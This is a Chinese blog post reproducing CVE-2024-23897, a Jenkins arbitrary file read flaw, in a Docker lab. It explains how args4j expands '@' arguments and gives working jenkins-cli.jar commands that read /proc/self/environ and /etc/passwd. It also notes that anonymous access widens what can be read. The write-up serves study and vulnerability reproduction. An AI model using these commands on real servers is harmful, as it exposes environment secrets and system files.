当前位置:   article > 正文

CVE-2024-23897 JenKins任意文件读取漏洞复现

cve-2024-23897 jenkins任意文件读取漏洞复现

1.漏洞介绍

        Jenkins提供了一个命令行的接口,用户可以在下载一个命令行客户端jenkins-cli.jar到本地,并调用该客户端来执行一些Jenkins的功能。本来是一个很常见的功能,但设计中神奇的是,用户使用jenkins-cli.jar时,命令行是传到服务端解析的,而不是在jenkins-cli.jar里解析。

        这就导致了一个问题,因为Jenkins服务端解析命令行时使用了一个第三方库args4j,这个库实现了Linux中一个常见的功能——如果一个参数是以@开头,则会被自动认为是一个文件名,文件内容会被读取作为参数

受影响版本

        JenKins <= 2.441

        Jenkins LTS <= 2.426.2

2.环境搭建

        2.1 使用docker搭建环境

从Docker Hub上拉取一个名为bitnami/jenkins:2.426.2-debian-11-r3的Docker镜像。

docker pull bitnami/jenkins:2.426.2-debian-11-r3

 运行一个Bitnami提供的Jenkins镜像,设置参数和端口映射,并启动镜像。

docker run -e "JAVA_OPTS=-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=0.0.0.0:5005" -d --name jenkins -p 8081:8080 -p 8777:5005 bitnami/jenkins:2.426.2-debian-11-r3

        2.2登录测试

地址:kali本地IP:8081        默认管理员账号密码:user/bitnami

三、漏洞利用

        3.1 下载JenKins-cli.jar包

我们发现使用wget命令可以在外部将JenKins-cli.jar包下载至桌面

wget http://localhost:8081/jnlpJars/jenkins-cli.jar

通过Jenkins-cli.jar包进行 读取文件以获取 Jenkins 基本目录

java -jar jenkins-cli.jar -s http://localhost:8081/ -http help 1 "@/proc/self/environ"

OK

四、扩展

利用JenKins-cli.jar包探索敏感目录文件;例如:/etc/passwd

在这里我们发现左边是只有一条是暴露。

开启匿名者访问权限
选项在后台的”Manage Jenkins“->"security"中管理员可将其开启或关闭。默认是关闭的

这样使用JenKins-cli.jar包就可以无限制探索了。

五、JenKins任意文件读取(CVE-2024-23897)漏洞原理

        Jenkins文件读取漏洞的原理是args4j在解析命令行的时候会把@后面的字符作为文件名,并读取文件内容作为参数的值。

        但是作为攻击者,我们必须想办法让Jenkins或args4j,将读到的文件内容返回给我们,才能最终达到任意文件读取的目的。好在,当我们调用命令行时,如果出错,args4j就会把错误返回给客户端,而错误信息中就包含文件的内容

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/繁依Fanyi0/article/detail/816831
推荐阅读
相关标签
  

闽ICP备14008679号